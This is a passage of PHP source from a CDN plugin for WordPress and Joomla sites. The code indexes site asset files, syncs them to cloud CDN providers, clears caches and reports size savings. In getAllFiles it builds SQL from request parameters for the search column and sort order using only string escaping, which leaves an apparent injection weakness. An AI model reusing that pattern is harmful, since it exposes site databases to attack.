<?php
/**
 * @package Blue Hat CDN
 * @version 1.3
 * @copyright (C) Copyright 2013 Blue Hat Network, BlueHatNetwork.com. All rights reserved.
 * @license GNU/GPL http://www.gnu.org/licenses/gpl-3.0.txt

This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.

This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with this program.  If not, see <http://www.gnu.org/licenses/>.
*/

class BlueHatCDNModelBlueHatCDN 
{
	var $_allowedImgFileTypes = array('.png', '.gif', '.jpeg', '.jpg', '.ico');
	var $_allowedCSSFileTypes = array('.css');
	var $_allowedJSFileTypes = array('.js');
	var $_allowedFontFileTypes = array('.svg', '.ttf', '.otf', '.woff', '.eot');
	var $_allowedFlashFileTypes = array('.swf');
	var $_excludedFilesRegex = null;
	var $_allowedImgFilesTypesRegex = null;
	var $_allowedJSFilesTypesRegex = null;
	var $_allowedCSSFilesTypesRegex = null;
	var $_allowedFontFilesTypesRegex = null;
	var $_allowedSWFFilesTypesRegex = null;
	var $_allFiles = array();
	var $_includeImages = true;
	var $_includeJS = true;
	var $_includeCSS = true;
	var $_includeFont = true;
	var $_includeSWF = true;
	var $_allowedFullRegex = null;
	var $_processId = 0;
	var $_maxFileSize = 5242880; // 5 megabytes max file size allowed
	var $_html = null;
	var $_hasBeenOptimizedAlready = false;
	var $_hasOptimizations = false;
    var $_replacementHash = 'BHNMINIHTMLwa';
    var $_placeholders = array();
	var $_cdnData = null;
	var $_elementsOnPage = array();
	var $_elementsOnPageToOffload = array();
	var $_fileChecksums = array();
	var $_currentUnixTimestamp = null;
	var $_isWindows = null;
	var $_prepedRootPath = null;
	var $_currentUri = null;
	var $_currentDir = null;
	var $_domainCheckRegex = null;
	var $_availableCDNFQDNS = array();
	var $_lastFQDNIndexused = 0;
	var $_prefetchDNSDomains = array();
	
	function setHtml($html)
	{
		$this->_html = $html;
	}
	
	function validateCDNAPICredentials($cdnProvider, $cdnUsername, $cdnAPIKey)
	{
		if($cdnProvider == 'bhn')
		{
			if(!class_exists('BlueHatCDNModelBlueHatCDNBHN')) require dirname(__FILE__).DIRECTORY_SEPARATOR.'bluehatcdnBHN.php';
			
			$model = new BlueHatCDNModelBlueHatCDNBHN();
		}
		elseif($cdnProvider == 'aws')
		{
			if(!class_exists('BlueHatCDNModelBlueHatCDNAmazon')) require dirname(__FILE__).DIRECTORY_SEPARATOR.'bluehatcdnAmazon.php';
			
			$model = new BlueHatCDNModelBlueHatCDNAmazon();
		}
		elseif($cdnProvider == 'rackspace_cloudfiles' || $cdnProvider == 'rackspace_cloudfiles_uk')
		{
			if(!class_exists('BlueHatCDNModelBlueHatCDNRackspace')) require dirname(__FILE__).DIRECTORY_SEPARATOR.'bluehatcdnRackspace.php';
			
			$model = new BlueHatCDNModelBlueHatCDNRackspace();
			
			if($cdnProvider == 'rackspace_cloudfiles_uk') $model->setUK();
		}
		
		return $model->validateCDNAPICredentials($cdnProvider, $cdnUsername, $cdnAPIKey);
	}
	
	function scanFiles()
	{
		ini_set('memory_limit', -1);
		ini_set('pcre.backtrack_limit', 100000 * 100000);
		ini_set('pcre.recursion_limit', 50000 * 100000);
		
		set_time_limit(0);                   // ignore php timeout
		ignore_user_abort(true);             // keep on going even if user pulls the plug*
		while(ob_get_level()) ob_end_clean(); // remove output buffers
		ob_implicit_flush(true);             // output stuff directly
		
		if(!class_exists('BlueHatNetworkSetting')) require dirname(__FILE__).DIRECTORY_SEPARATOR.'..'.DIRECTORY_SEPARATOR.'lib'.DIRECTORY_SEPARATOR.'setting.php';
		if(!class_exists('BlueHatNetworkDateTime')) require dirname(__FILE__).DIRECTORY_SEPARATOR.'..'.DIRECTORY_SEPARATOR.'lib'.DIRECTORY_SEPARATOR.'datetime.php';
		if(!class_exists('BlueHatNetworkDatabase')) require dirname(__FILE__).DIRECTORY_SEPARATOR.'..'.DIRECTORY_SEPARATOR.'lib'.DIRECTORY_SEPARATOR.'database.php';
		
		$this->_processId = BlueHatNetworkDateTime::getCurrentUnixStamp();
		
		// Reset status message now that we are done
		BlueHatNetworkSetting::set('status_msg', '');
		BlueHatNetworkSetting::set('process_id', $this->_processId);
		BlueHatNetworkSetting::set('process_mode', 'scan');
		
		sleep(4);
		
		$this->_isWindows = (strncasecmp(PHP_OS, 'WIN', 3) == 0) ? true : false;
		$this->_currentUnixTimestamp = BlueHatNetworkDateTime::getCurrentUnixStamp();
		$this->_includeImages = BlueHatNetworkSetting::get('include_images', true);
		$this->_includeJS = BlueHatNetworkSetting::get('include_js', true);
		$this->_includeCSS = BlueHatNetworkSetting::get('include_css', true);
		$this->_includeFont = BlueHatNetworkSetting::get('include_font', true);
		$this->_includeSWF = BlueHatNetworkSetting::get('include_swf', true);
		$this->_prepedRootPath = ($this->_isWindows) ? str_replace('\\', '/', rtrim(ABSPATH, DIRECTORY_SEPARATOR)) : rtrim(ABSPATH, DIRECTORY_SEPARATOR);
		
		$preferredCDN = BlueHatNetworkSetting::get('cdn_provider');
		$cdnUsername = BlueHatNetworkSetting::get('cdn_username');
		$cdnAPIKey = BlueHatNetworkSetting::get('cdn_api_key');
		
		if($preferredCDN == 'bhn')
		{
			if(!class_exists('BlueHatCDNModelBlueHatCDNBHN')) require dirname(__FILE__).DIRECTORY_SEPARATOR.'bluehatcdnBHN.php';
			
			$syncModelObj = new BlueHatCDNModelBlueHatCDNBHN();
		}
		elseif($preferredCDN == 'aws')
		{
			if(!class_exists('BlueHatCDNModelBlueHatCDNAmazon')) require dirname(__FILE__).DIRECTORY_SEPARATOR.'bluehatcdnAmazon.php';
			
			$syncModelObj = new BlueHatCDNModelBlueHatCDNAmazon();
		}
		elseif($preferredCDN == 'rackspace_cloudfiles' || $preferredCDN == 'rackspace_cloudfiles_uk')
		{
			if(!class_exists('BlueHatCDNModelBlueHatCDNRackspace')) require dirname(__FILE__).DIRECTORY_SEPARATOR.'bluehatcdnRackspace.php';
			
			$syncModelObj = new BlueHatCDNModelBlueHatCDNRackspace();
			
			if($preferredCDN == 'rackspace_cloudfiles_uk') $syncModelObj->setUK();
		}
		else
		{
			BlueHatNetworkSetting::set('status_msg', '<b style="color: red; font-size: 1.2em;">Error: '.__('BHN_SELECT_CDN_ERROR', 'blue-hat-cdn').'</b>');
			
			sleep(4);
			
			return false;
		}
		
		$syncModelObj->setProcessId($this->_processId);
		$syncModelObj->validateCDNAPICredentials($preferredCDN, $cdnUsername, $cdnAPIKey);
		
		$allFiles = $this->_processDirectory(rtrim(ABSPATH, DIRECTORY_SEPARATOR));
		
		sleep(4);
		
		BlueHatNetworkSetting::set('process_mode', 'sync');
		BlueHatNetworkSetting::set('status_msg', '');
		
		sleep(4);
		
		$syncModelObj->syncFiles($allFiles, $this->_fileChecksums);
		if($syncModelObj->getFilesSyncedCount() > 0) $this->clearWebsiteCache();
			
		sleep(4);
		
		BlueHatNetworkSetting::set('process_mode', 'completed');
		BlueHatNetworkSetting::set('status_msg', '');
		
		sleep(4);
		
		return count($allFiles);
	}
	
	function _recordFile($fullWebFilePath)
	{
		global $wpdb;
		
		if(!class_exists('BlueHatNetworkDatabase')) require dirname(__FILE__).DIRECTORY_SEPARATOR.'..'.DIRECTORY_SEPARATOR.'lib'.DIRECTORY_SEPARATOR.'database.php';
		
		$this->_fileChecksums[$fullWebFilePath] = md5_file($this->_prepedRootPath.$fullWebFilePath);
		$fileName = basename($fullWebFilePath);
		$fileSizeVal = (int)filesize($this->_prepedRootPath.$fullWebFilePath);
		
		$sql = 'INSERT INTO '.$wpdb->prefix.'bhn_file 
				(
					file_full_path,
					file_name,
					file_path,
					file_extension,
					file_original_md5,
					file_original_filesize,
					file_final_filesize,
					file_cdate,
					file_mdate
				) 
				VALUES 
				('.BlueHatNetworkDatabase::quote($fullWebFilePath).',
				'.BlueHatNetworkDatabase::quote($fileName).',
				'.BlueHatNetworkDatabase::quote(dirname($fullWebFilePath).'/').',
				'.BlueHatNetworkDatabase::quote(strtolower(preg_replace('@^.+?\.([^\.]+)$@', '$1', $fileName))).',
				'.BlueHatNetworkDatabase::quote($this->_fileChecksums[$fullWebFilePath]).', 
				'.$fileSizeVal.',
				'.$fileSizeVal.', 
				'.$this->_currentUnixTimestamp.', 
				'.$this->_currentUnixTimestamp.') 
				ON DUPLICATE KEY UPDATE 
					file_original_md5 = VALUES(file_original_md5), 
					file_original_filesize = VALUES(file_original_filesize), 
					file_mdate = VALUES(file_mdate);';
		
		BlueHatNetworkDatabase::query($sql);
	}
	
	function clearWebsiteCache()
	{
		if(!class_exists('BlueHatNetworkFactory')) require dirname(__FILE__).DIRECTORY_SEPARATOR.'..'.DIRECTORY_SEPARATOR.'lib'.DIRECTORY_SEPARATOR.'factory.php';
		if(!class_exists('BlueHatNetworkSetting')) require dirname(__FILE__).DIRECTORY_SEPARATOR.'..'.DIRECTORY_SEPARATOR.'lib'.DIRECTORY_SEPARATOR.'setting.php';
		if(!class_exists('BlueHatNetworkDateTime')) require dirname(__FILE__).DIRECTORY_SEPARATOR.'..'.DIRECTORY_SEPARATOR.'lib'.DIRECTORY_SEPARATOR.'datetime.php';
		
		if(BlueHatNetworkFactory::isWordPress())
		{
			$cacheDir = WP_CONTENT_DIR.DIRECTORY_SEPARATOR.'cache';
		}
		elseif(BlueHatNetworkFactory::isJoomla())
		{
			$cacheDir = JPATH_SITE.DIRECTORY_SEPARATOR.'cache';
		}
		else
		{
			return false;
		}
		
		if(file_exists($cacheDir)) $this->_deleteFilesInDir($cacheDir);
		
		BlueHatNetworkSetting::set('cache_last_cleared', BlueHatNetworkDateTime::getCurrentUnixStamp());
	}
	
	function _deleteFilesInDir($dirPath)
	{
		$files = glob($dirPath.DIRECTORY_SEPARATOR.'*');
		
		foreach($files as $file)
		{
			if(is_dir($file))
			{
				$this->_deleteFilesInDir($file);
				
				rmdir($file);
			}
			else
			{
				unlink($file);
			}
		}
	}
	
	function getFileExt($file) 
	{
		$dot = strrpos($file, '.') + 1;
		return substr($file, $dot);
	}
	
	function _processDirectory($dirPath, $resetAllFilesArray=true)
	{
		if(!class_exists('BlueHatNetworkSetting')) require dirname(__FILE__).DIRECTORY_SEPARATOR.'..'.DIRECTORY_SEPARATOR.'lib'.DIRECTORY_SEPARATOR.'setting.php';
		
		if($resetAllFilesArray) $this->_allFiles = array();
		
		if($handle = opendir($dirPath))
		{
			$directoriesToProcess = array();
			
			$preppedBasePath = rtrim(ABSPATH, DIRECTORY_SEPARATOR);
			$basePath = str_replace($preppedBasePath, '', $dirPath);
			
			while(($entry = readdir($handle)) !== false)
			{
				//if(count($this->_allFiles) > 10) break;
				if(BlueHatNetworkSetting::get('process_id', null, false) != $this->_processId) exit();
				
				if($entry != '.' && $entry != '..' && substr($entry, 0, 1) != '.' && !is_link($dirPath.DIRECTORY_SEPARATOR.$entry) && !preg_match('@('.$this->_getExcludedFilesRegex().')@i', $dirPath.DIRECTORY_SEPARATOR.$entry))
				{
					$theFileSize = filesize($dirPath.DIRECTORY_SEPARATOR.$entry);
					
					if(is_dir($dirPath.DIRECTORY_SEPARATOR.$entry))
					{
						// This is a directory
						$directoriesToProcess[] = $dirPath.DIRECTORY_SEPARATOR.$entry;
					}
					elseif($this->_processFile($dirPath.DIRECTORY_SEPARATOR.$entry) && $theFileSize > 0 && $theFileSize < $this->_maxFileSize)
					{
						// This is a file, process it
						$trimmedFilePath = $basePath.DIRECTORY_SEPARATOR.$entry;
						
						$this->_allFiles[] = ($this->_isWindows) ? str_replace('\\', '/', $trimmedFilePath) : $trimmedFilePath;
						
						BlueHatNetworkSetting::set('status_msg', sprintf(__('BHN_FOUND_FILE_MSG', 'blue-hat-cdn'), number_format(count($this->_allFiles)), $trimmedFilePath));
						
						$this->_recordFile($trimmedFilePath);
					}
				}
			}
			
			closedir($handle);
			
			if(!empty($directoriesToProcess))
			{
				foreach($directoriesToProcess as $fullFilePath)
				{
					if(BlueHatNetworkSetting::get('process_id', null, false) != $this->_processId) exit();
					
					$this->_processDirectory($fullFilePath, false);
				}
			}
		}
		
		if($resetAllFilesArray) return $this->_allFiles;
	}
	
	function _processFile($filePath)
	{
		if(preg_match('@('.$this->_getExcludedFilesRegex().')@i', $filePath)) return false;
		
		if(empty($this->_allowedFullRegex))
		{
			$this->_allowedFullRegex = '';
		
			if($this->_includeImages) $this->_allowedFullRegex .= $this->_getAllowedImgFilesTypesRegex().'|';
			if($this->_includeJS) $this->_allowedFullRegex .= $this->_getAllowedJSFilesTypesRegex().'|';
			if($this->_includeCSS) $this->_allowedFullRegex .= $this->_getAllowedCSSFilesTypesRegex().'|';
			if($this->_includeFont) $this->_allowedFullRegex .= $this->_getAllowedFontFilesTypesRegex().'|';
			if($this->_includeSWF) $this->_allowedFullRegex .= $this->_getAllowedSWFFilesTypesRegex().'|';

			$this->_allowedFullRegex = rtrim($this->_allowedFullRegex, '|');
		}
		
		if(!empty($this->_allowedFullRegex)) if(preg_match('@('.$this->_allowedFullRegex.')$@i', $filePath)) return true;
		
		return false;
	}
	
	function _getExcludedFilesRegex()
	{
		if(!empty($this->_excludedFilesRegex)) return $this->_excludedFilesRegex;
		
		if(!class_exists('BlueHatNetworkSetting')) require dirname(__FILE__).DIRECTORY_SEPARATOR.'..'.DIRECTORY_SEPARATOR.'lib'.DIRECTORY_SEPARATOR.'setting.php';
		
		$excludedFilesList = BlueHatNetworkSetting::get('exclude_files', 'tmp/,logs/,cache/');
		
		if(!empty($excludedFilesList))
		{
			$this->_excludedFilesRegex = str_replace(',', '|', preg_quote($excludedFilesList, '@'));
			
			return $this->_excludedFilesRegex;
		}
		
		return '$^';
	}
	
	function _getAllowedImgFilesTypesRegex()
	{
		if(!empty($this->_allowedImgFilesTypesRegex)) return $this->_allowedImgFilesTypesRegex;
		
		$this->_allowedImgFilesTypesRegex = str_replace('.', '\.', implode('|', $this->_allowedImgFileTypes));
		
		return $this->_allowedImgFilesTypesRegex;
	}
	
	function _getAllowedJSFilesTypesRegex()
	{
		if(!empty($this->_allowedJSFilesTypesRegex)) return $this->_allowedJSFilesTypesRegex;
		
		$this->_allowedJSFilesTypesRegex = str_replace('.', '\.', implode('|', $this->_allowedJSFileTypes));
		
		return $this->_allowedJSFilesTypesRegex;
	}
	
	function _getAllowedCSSFilesTypesRegex()
	{
		if(!empty($this->_allowedCSSFilesTypesRegex)) return $this->_allowedCSSFilesTypesRegex;
		
		$this->_allowedCSSFilesTypesRegex = str_replace('.', '\.', implode('|', $this->_allowedCSSFileTypes));
		
		return $this->_allowedCSSFilesTypesRegex;
	}
	
	function _getAllowedFontFilesTypesRegex()
	{
		if(!empty($this->_allowedFontFilesTypesRegex)) return $this->_allowedFontFilesTypesRegex;
		
		$this->_allowedFontFilesTypesRegex = str_replace('.', '\.', implode('|', $this->_allowedFontFileTypes));
		
		return $this->_allowedFontFilesTypesRegex;
	}
	
	function _getAllowedSWFFilesTypesRegex()
	{
		if(!empty($this->_allowedSWFFilesTypesRegex)) return $this->_allowedSWFFilesTypesRegex;
		
		$this->_allowedSWFFilesTypesRegex = str_replace('.', '\.', implode('|', $this->_allowedFlashFileTypes));
		
		return $this->_allowedSWFFilesTypesRegex;
	}
	
	function getAllFiles($displayReady=false)
	{
		global $wpdb;
		
		if(!class_exists('BlueHatNetworkDatabase')) require dirname(__FILE__).DIRECTORY_SEPARATOR.'..'.DIRECTORY_SEPARATOR.'lib'.DIRECTORY_SEPARATOR.'database.php';
		if(!class_exists('BlueHatNetworkCommon')) require dirname(__FILE__).DIRECTORY_SEPARATOR.'..'.DIRECTORY_SEPARATOR.'lib'.DIRECTORY_SEPARATOR.'common.php';
		if(!class_exists('BlueHatNetworkLanguage')) require dirname(__FILE__).DIRECTORY_SEPARATOR.'..'.DIRECTORY_SEPARATOR.'lib'.DIRECTORY_SEPARATOR.'language.php';
		if(!class_exists('BlueHatNetworkRequest')) require dirname(__FILE__).DIRECTORY_SEPARATOR.'..'.DIRECTORY_SEPARATOR.'lib'.DIRECTORY_SEPARATOR.'request.php';
		if(!class_exists('BlueHatNetworkDateTime')) require dirname(__FILE__).DIRECTORY_SEPARATOR.'..'.DIRECTORY_SEPARATOR.'lib'.DIRECTORY_SEPARATOR.'datetime.php';
		if(!class_exists('BlueHatNetworkSetting')) require dirname(__FILE__).DIRECTORY_SEPARATOR.'..'.DIRECTORY_SEPARATOR.'lib'.DIRECTORY_SEPARATOR.'setting.php';
		
		$pageSize = BlueHatNetworkRequest::getInt('rows', 30, 'method');
		$currentPage = BlueHatNetworkRequest::getInt('page', 1, 'method');
		$doSearch = BlueHatNetworkRequest::getVar('_search', false, 'method');
		$searchField = BlueHatNetworkRequest::getVar('searchField', null, 'method');
		$searchString = BlueHatNetworkRequest::getVar('searchString', null, 'method');
		$searchSql = (!empty($doSearch) && !empty($searchField) && !empty($searchString)) ? ' WHERE '.BlueHatNetworkDatabase::escape($searchField).' COLLATE utf8_unicode_ci LIKE \'%'.BlueHatNetworkDatabase::escape($searchString).'%\' ' : '';
		$sortColumn = BlueHatNetworkRequest::getVar('sidx', 'file_mdate', 'method');
		$sortOrder = BlueHatNetworkRequest::getVar('sord', 'desc', 'method');
		
		$result = array(
			'page' => $currentPage,
			'records' => 0,
			'total' => 0,
			'rows' => array()
		);
		
		$sql = 'SELECT SQL_CALC_FOUND_ROWS 
					file_id,
					file_full_path,
					file_name,
					file_path,
					file_extension,
					file_original_md5,
					file_original_filesize,
					file_final_md5,
					file_final_filesize,
					file_cdate,
					file_mdate 
				FROM '.$wpdb->prefix.'bhn_file 
				'.$searchSql.' 
				ORDER BY '.BlueHatNetworkDatabase::escape($sortColumn).' '.BlueHatNetworkDatabase::escape($sortOrder).' 
				LIMIT '.((int)$pageSize*($currentPage-1)).', '.(int)$pageSize.';';
		$result['rows'] = BlueHatNetworkDatabase::getResults($sql);
		
		$sql = "SELECT FOUND_ROWS() AS 'total_rows';";
		$result['records'] = (int)BlueHatNetworkDatabase::getResult($sql);
		
		if(!empty($result['rows']))
		{
			$result['total'] = ceil($result['records']/$pageSize);
			
			if($displayReady)
			{
				$bucketPublicUri = BlueHatNetworkSetting::get('bucket_public_uri', '');
				
				foreach($result['rows'] as $key => $record)
				{
					$result['rows'][$key]['file_original_filesize'] = BlueHatNetworkCommon::humanReadableFilesize($record['file_original_filesize']);
					
					// If file has been synced to CDN
					if(!empty($record['file_final_md5']))
					{
						$result['rows'][$key]['file_final_filesize'] = BlueHatNetworkCommon::humanReadableFilesize($record['file_final_filesize']);
						$result['rows'][$key]['file_mdate'] = '<a href=\''.$bucketPublicUri.$result['rows'][$key]['file_full_path'].'\' target="blank">'.date('F j, Y, g:i a', BlueHatNetworkDateTime::convertGMTUnixTimeStampToLocal($record['file_mdate'])).'</a>';
					}
					else
					{
						$result['rows'][$key]['file_final_filesize'] = '-';
						$result['rows'][$key]['file_mdate'] = '<span style=\'color: red;\'>'.BlueHatNetworkLanguage::_('BHN_NEVER').'</span>';
					}
					
					$result['rows'][$key]['file_full_path'] = '<a href="'.site_url().$result['rows'][$key]['file_full_path'].'" target="blank">'.$result['rows'][$key]['file_full_path'].'</a>';
				}
			}
		}
		else
		{
			$result['page'] = 0;
		}
		
		return $result;
	}
	
	function resetIndexData()
	{
		global $wpdb;
		
		if(!class_exists('BlueHatNetworkDatabase')) require dirname(__FILE__).DIRECTORY_SEPARATOR.'..'.DIRECTORY_SEPARATOR.'lib'.DIRECTORY_SEPARATOR.'database.php';
		if(!class_exists('BlueHatNetworkSetting')) require dirname(__FILE__).DIRECTORY_SEPARATOR.'..'.DIRECTORY_SEPARATOR.'lib'.DIRECTORY_SEPARATOR.'setting.php';
		if(!class_exists('BlueHatNetworkDateTime')) require dirname(__FILE__).DIRECTORY_SEPARATOR.'..'.DIRECTORY_SEPARATOR.'lib'.DIRECTORY_SEPARATOR.'datetime.php';
		
		$this->_processId = BlueHatNetworkDateTime::getCurrentUnixStamp();
		
		// Reset status message now that we are done
		BlueHatNetworkSetting::set('status_msg', '');
		BlueHatNetworkSetting::set('process_id', $this->_processId);
		BlueHatNetworkSetting::set('process_mode', 'completed');
		
		sleep(1);
		
		$sql = 'TRUNCATE TABLE '.$wpdb->prefix.'bhn_file;';
		
		return BlueHatNetworkDatabase::query($sql);
	}
	
	function getFileStats($displayFriendly=false)
	{
		global $wpdb;
		
		if(!class_exists('BlueHatNetworkDatabase')) require dirname(__FILE__).DIRECTORY_SEPARATOR.'..'.DIRECTORY_SEPARATOR.'lib'.DIRECTORY_SEPARATOR.'database.php';
		if(!class_exists('BlueHatNetworkCommon')) require dirname(__FILE__).DIRECTORY_SEPARATOR.'..'.DIRECTORY_SEPARATOR.'lib'.DIRECTORY_SEPARATOR.'common.php';
		
		$sql = 'SELECT 
					file_extension, 
					count(*) AS \'total_count\', 
					SUM(file_original_filesize) AS \'original_file_size\', 
					SUM(file_final_filesize) AS \'final_file_size\' 
				FROM '.$wpdb->prefix.'bhn_file 
				GROUP BY file_extension;';
		
		$tmpStatsResult = BlueHatNetworkDatabase::getResults($sql);
		
		$statsResult = array();
		$fileOriginalSizeResult = array();
		$fileFinalSizeResult = array();
		
		if(!empty($tmpStatsResult))
		{
			foreach($tmpStatsResult as $key => $row)
			{
				$statsResult[$row['file_extension']] = (int)$row['total_count'];
				$fileOriginalSizeResult[$row['file_extension']] = (int)$row['original_file_size'];
				$fileFinalSizeResult[$row['file_extension']] = (int)$row['final_file_size'];
			}
		}
		
		if(!$displayFriendly)
		{
			$result = array();
			
			$result['BHN_TOTAL_INDEXED_FILES'] = 0;
			$result['BHN_TOTAL_INDEXED_IMGS'] = 0;
			$result['BHN_TOTAL_INDEXED_JS'] = 0;
			$result['BHN_TOTAL_INDEXED_CSS'] = 0;
			$result['BHN_TOTAL_INDEXED_FONT'] = 0;
			$result['BHN_TOTAL_INDEXED_FLASH'] = 0;
			
			if(!empty($statsResult))
			{
				// Now actual data
				$result['BHN_TOTAL_INDEXED_IMGS'] = (int)@$statsResult['jpeg']+(int)@$statsResult['jpg']+(int)@$statsResult['gif']+(int)@$statsResult['ico']+(int)@$statsResult['png'];
				$result['BHN_TOTAL_INDEXED_JS'] = (int)@$statsResult['js'];
				$result['BHN_TOTAL_INDEXED_CSS'] = (int)@$statsResult['css'];
				$result['BHN_TOTAL_INDEXED_FONT'] = (int)@$statsResult['svg']+(int)@$statsResult['ttf']+(int)@$statsResult['otf']+(int)@$statsResult['woff']+(int)@$statsResult['eot'];
				$result['BHN_TOTAL_INDEXED_FLASH'] = (int)@$statsResult['swf'];
				$result['BHN_TOTAL_INDEXED_FILES'] = (int)$result['BHN_TOTAL_INDEXED_IMGS']+(int)$result['BHN_TOTAL_INDEXED_JS']+(int)$result['BHN_TOTAL_INDEXED_CSS']+(int)$result['BHN_TOTAL_INDEXED_FONT']+(int)$result['BHN_TOTAL_INDEXED_FLASH'];
			}
		}
		else
		{
			// Build default
			$result = '';
			
			$result .= sprintf(__('BHN_TOTAL_INDEXED_FILES', 'blue-hat-cdn'), 0, 0, 0, '0%');
			$result .= '<br />';
			$result .= sprintf(__('BHN_TOTAL_INDEXED_IMGS', 'blue-hat-cdn'), 0, 0, 0, '0%');
			$result .= '<br />';
			$result .= sprintf(__('BHN_TOTAL_INDEXED_JS', 'blue-hat-cdn'), 0, 0, 0, '0%');
			$result .= '<br />';
			$result .= sprintf(__('BHN_TOTAL_INDEXED_CSS', 'blue-hat-cdn'), 0, 0, 0, '0%');
			$result .= '<br />';
			$result .= sprintf(__('BHN_TOTAL_INDEXED_FONT', 'blue-hat-cdn'), 0, 0, 0, '0%');
			//$result .= '<br />';
			//$result .= sprintf(__('BHN_TOTAL_INDEXED_FLASH', 'blue-hat-cdn'), 0, 0, 0, '0%');
			
			if(!empty($statsResult))
			{
				// Now actual data
				$result = '';
				
				$totalFilesOriginalSize = (int)@$fileOriginalSizeResult['jpeg']+(int)@$fileOriginalSizeResult['jpg']+(int)@$fileOriginalSizeResult['gif']+(int)@$fileOriginalSizeResult['ico']+(int)@$fileOriginalSizeResult['png']+(int)@$fileOriginalSizeResult['js']+(int)@$fileOriginalSizeResult['css']+(int)@$fileOriginalSizeResult['svg']+(int)@$fileOriginalSizeResult['ttf']+(int)@$fileOriginalSizeResult['otf']+(int)@$fileOriginalSizeResult['woff']+(int)@$fileOriginalSizeResult['eot']+(int)@$fileOriginalSizeResult['swf'];
				$totalFilesFinalSize = (int)@$fileFinalSizeResult['jpeg']+(int)@$fileFinalSizeResult['jpg']+(int)@$fileFinalSizeResult['gif']+(int)@$fileFinalSizeResult['ico']+(int)@$fileFinalSizeResult['png']+(int)@$fileFinalSizeResult['js']+(int)@$fileFinalSizeResult['css']+(int)@$fileFinalSizeResult['svg']+(int)@$fileFinalSizeResult['ttf']+(int)@$fileFinalSizeResult['otf']+(int)@$fileFinalSizeResult['woff']+(int)@$fileFinalSizeResult['eot']+(int)@$fileFinalSizeResult['swf'];
				$totalFilesSavings = $totalFilesOriginalSize - $totalFilesFinalSize;
				$totalFileSavingsPercent = ($totalFilesOriginalSize > 0) ? round($totalFilesSavings/$totalFilesOriginalSize, 2)*100 : 0;
				$totalFileSavingsPercent = (string)$totalFileSavingsPercent.'%';
				
				$imgsOriginalFileSize = (int)@$fileOriginalSizeResult['jpeg']+(int)@$fileOriginalSizeResult['jpg']+(int)@$fileOriginalSizeResult['gif']+(int)@$fileOriginalSizeResult['ico']+(int)@$fileOriginalSizeResult['png'];
				$imgsFinalFileSize = (int)@$fileFinalSizeResult['jpeg']+(int)@$fileFinalSizeResult['jpg']+(int)@$fileFinalSizeResult['gif']+(int)@$fileFinalSizeResult['ico']+(int)@$fileFinalSizeResult['png'];
				$imgsFileSavings = $imgsOriginalFileSize-$imgsFinalFileSize;
				$imgsSavingsPercent = ($imgsOriginalFileSize > 0) ? round($imgsFileSavings/$imgsOriginalFileSize, 2)*100 : 0;
				$imgsSavingsPercent = (string)$imgsSavingsPercent.'%';
				
				$fontOriginalFileSize = (int)@$fileOriginalSizeResult['svg']+(int)@$fileOriginalSizeResult['ttf']+(int)@$fileOriginalSizeResult['otf']+(int)@$fileOriginalSizeResult['woff']+(int)@$fileOriginalSizeResult['eot'];
				$fontFinalFileSize = (int)@$fileFinalSizeResult['svg']+(int)@$fileFinalSizeResult['ttf']+(int)@$fileFinalSizeResult['otf']+(int)@$fileFinalSizeResult['woff']+(int)@$fileFinalSizeResult['eot'];
				$fontFileSavings = $fontOriginalFileSize-$fontFinalFileSize;
				$fontFileSavingsPercent = ($fontOriginalFileSize > 0) ? round($fontFileSavings/$fontOriginalFileSize, 2)*100 : 0;
				$fontFileSavingsPercent = (string)$fontFileSavingsPercent.'%';
				
				$jsOriginalFileSize = (int)@$fileOriginalSizeResult['js'];
				$jsFinalFileSize = (int)@$fileFinalSizeResult['js'];
				$jsFileSavings = $jsOriginalFileSize-$jsFinalFileSize;
				$jsFileSavingsPercent = ($jsOriginalFileSize > 0) ? round($jsFileSavings/$jsOriginalFileSize, 2)*100 : 0;
				$jsFileSavingsPercent = (string)$jsFileSavingsPercent.'%';
				
				$flashOriginalFileSize = (int)@$fileOriginalSizeResult['swf'];
				$flashFinalFileSize = (int)@$fileFinalSizeResult['swf'];
				$flashFileSavings = $flashOriginalFileSize-$flashFinalFileSize;
				$flashFileSavingsPercent = ($flashOriginalFileSize > 0) ? round($flashFileSavings/$flashOriginalFileSize, 2)*100 : 0;
				$flashFileSavingsPercent = (string)$flashFileSavingsPercent.'%';
				
				$cssOriginalFileSize = (int)@$fileOriginalSizeResult['css'];
				$cssFinalFileSize = (int)@$fileFinalSizeResult['css'];
				$cssFileSavings = $cssOriginalFileSize-$cssFinalFileSize;
				$cssFileSavingsPercent = ($cssOriginalFileSize > 0) ? round($cssFileSavings/$cssOriginalFileSize, 2)*100 : 0;
				$cssFileSavingsPercent = (string)$cssFileSavingsPercent.'%';
				
				$result .= sprintf(__('BHN_TOTAL_INDEXED_FILES', 'blue-hat-cdn'), number_format((int)@$statsResult['jpeg']+(int)@$statsResult['jpg']+(int)@$statsResult['gif']+(int)@$statsResult['ico']+(int)@$statsResult['png']+(int)@$statsResult['js']+(int)@$statsResult['css']+(int)@$statsResult['svg']+(int)@$statsResult['ttf']+(int)@$statsResult['otf']+(int)@$statsResult['woff']+(int)@$statsResult['eot']+(int)@$statsResult['swf']), BlueHatNetworkCommon::humanReadableFilesize($totalFilesOriginalSize), BlueHatNetworkCommon::humanReadableFilesize($totalFilesFinalSize), BlueHatNetworkCommon::humanReadableFilesize($totalFilesSavings).' '.$totalFileSavingsPercent);
				$result .= '<br />';
				$result .= sprintf(__('BHN_TOTAL_INDEXED_IMGS', 'blue-hat-cdn'), number_format((int)@$statsResult['jpeg']+(int)@$statsResult['jpg']+(int)@$statsResult['gif']+(int)@$statsResult['ico']+(int)@$statsResult['png']), BlueHatNetworkCommon::humanReadableFilesize($imgsOriginalFileSize), BlueHatNetworkCommon::humanReadableFilesize($imgsFinalFileSize), BlueHatNetworkCommon::humanReadableFilesize($imgsFileSavings).' '.$imgsSavingsPercent);
				$result .= '<br />';
				$result .= sprintf(__('BHN_TOTAL_INDEXED_JS', 'blue-hat-cdn'), number_format((int)@$statsResult['js']), BlueHatNetworkCommon::humanReadableFilesize($jsOriginalFileSize), BlueHatNetworkCommon::humanReadableFilesize($jsFinalFileSize), BlueHatNetworkCommon::humanReadableFilesize($jsFileSavings).' '.$jsFileSavingsPercent);
				$result .= '<br />';
